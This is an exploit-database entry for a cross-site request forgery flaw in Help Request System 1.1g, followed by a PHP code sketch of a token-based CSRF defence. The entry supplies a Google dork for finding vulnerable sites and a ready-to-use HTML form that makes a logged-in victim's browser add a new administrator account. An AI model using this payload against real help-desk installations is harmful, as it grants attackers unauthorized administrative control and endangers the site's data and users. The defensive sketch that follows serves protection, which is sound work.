Help Desk Software 1.1g XSRF (add admin) Vulnerability

2011-08-23T00:00:00
ID 1337DAY-ID-16753
Type zdt
Reporter G13
Modified 2011-08-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
# Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g
 
<html>
<body>
<form id="edit" method="post"
action="http://localhost/request/index.php?sub=users&action=store&type=add"
enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name"
size="35" maxlength="" value=""><br>
Login name:<input class="FormItemTextbox" type="text" name="user_login"
size="20" maxlength="" value=""><br>
Pass:<input class="FormItemTextbox" type="password" id="user_password"
name="user_password" size="20" value=""><br>
Pass confirm:<input class="FormItemTextbox" type="password"
id="user_password_confirm" name="user_password_confirm" size="20"
value=""><br>
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit"
name="submit">
</form>
</body>
</html>
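
A defensive sketch, added here and not taken from the application's own code: the form above is accepted because the `action=store` request carries nothing an outside page cannot predict, so a per-session token checked before the user is stored rejects cross-site submissions. The function names, the `csrf_token` field and session key, and the placement of the guard are assumptions.

```php
<?php
// Added example: synchronizer-token CSRF defence for a state-changing
// request such as index.php?sub=users&action=store&type=add.
// All names here (functions, 'csrf_token' field and session key) are hypothetical.

// SameSite keeps the session cookie off most cross-site POSTs (PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a POST whose token matches the one held in the session.
function csrf_check(): bool
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $sent  = $_POST['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; reject arrays and empty tokens.
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

// Guard placed before the handler that stores the new user.
if (($_GET['action'] ?? '') === 'store' && !csrf_check()) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```

The add-user form would emit `csrf_field()` inside its `<form>` element so that legitimate submissions carry the token.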


